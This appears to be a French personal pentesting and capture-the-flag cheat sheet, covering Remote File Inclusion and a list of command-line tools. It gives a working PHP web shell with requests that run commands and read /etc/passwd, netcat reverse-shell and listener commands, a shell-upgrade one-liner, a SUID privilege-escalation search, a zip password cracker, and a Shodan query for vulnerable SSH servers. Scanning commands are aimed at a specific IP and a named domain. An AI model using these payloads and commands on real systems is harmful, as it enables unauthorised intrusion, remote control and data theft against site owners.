sécuritée
remote file inclusion | ||||
---|---|---|---|---|
Remote File Inclusion (RFI) est un type de vulnérabilité trouvé le plus souvent sur des sites web. Il permet à un attaquant d'inclure un fichier distant, généralement par le biais d'un script sur le serveur web. La vulnérabilité est due à l'utilisation de l'entrée fournie par l'utilisateur sans validation adéquate | ||||
file img.php : ################### <?php system($_GET['phoenix']); ?> | permet d'executer une commande sur le site cible | url?phoenix=id url?phoenix=cat%20../../../../etc/passwd | ||
Quelques commandes utiles | ||||
---|---|---|---|---|
nmap [ip] -sP -e [interface] | connaitre les hotes sur le réseau | |||
nmap -An -p 1-65535 [ip] | connaitre les port ouvert d'une machine | |||
pdftotext | transforme un pdf en texte dans le paquet poppler | |||
netstat -plants | affiches les connexions | |||
binwalk -h | stegaographic tools | |||
foremost | recuperer des fichiers caches | |||
strings | affiche toutes les chaines de caractere d'un fichier | |||
exrex | permet de génerer toutes les possibilite sur une chaine | |||
zsteg | steganographie tools exemple : zsteg b1,rgb,lsb,y | |||
xxd | convertisseur hexadecimal | |||
nikto -url 82.65.105.229 | permet de connaitre la version d'apache | |||
dirb http://www.domotrix.fr | mapper un site | |||
https://gtfobins.github.io/# | permet l'escalade de privilege | |||
python -m SimpleHTTPServer | cree un serveur python petit | |||
brainfuck | ||||
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ | escalade de privilege | |||
https://www.shodan.io/ | liste des version vulnerables port:22 libssh country="FR" | |||
arp-scan -l | permet de voir les hotes du reseau | |||
find / -perm -u=s -type f 2>/dev/null | permet de voir les fichier ou le sticky bit est positionnee | |||
url?cmd=nc -lnvp 1234 | ouvre uneconnexion sur le port 1234 | |||
nc -e /bin/bash <ip> <port> | ouvre une connection | |||
pidof | connaitre le nom d'un processus | |||
fg | foreground | |||
bg | background | |||
uname -a | avoir les information sur la version | |||
python -c 'import pty;pty.spawn("/bin/bash")' | ||||
fcrackzip | craquer les mot de passes zip | |||
#!/bin/bash | ||||
openssl openssl x509 -inform DER -in <fichier> -text | pour lire un certificat | |||
echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf | bloquer la réponse au ping | |||
$ find / -name "word"
$ grep -r -i word ./
$ sed '/debut/,/fin/ s/.*//' fichier
$ grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ python -m SimpleHTTPServer
$ python3 -m http.server
$ for i in {0..10}; do echo "$i"; done
$ nc -e /bin/bash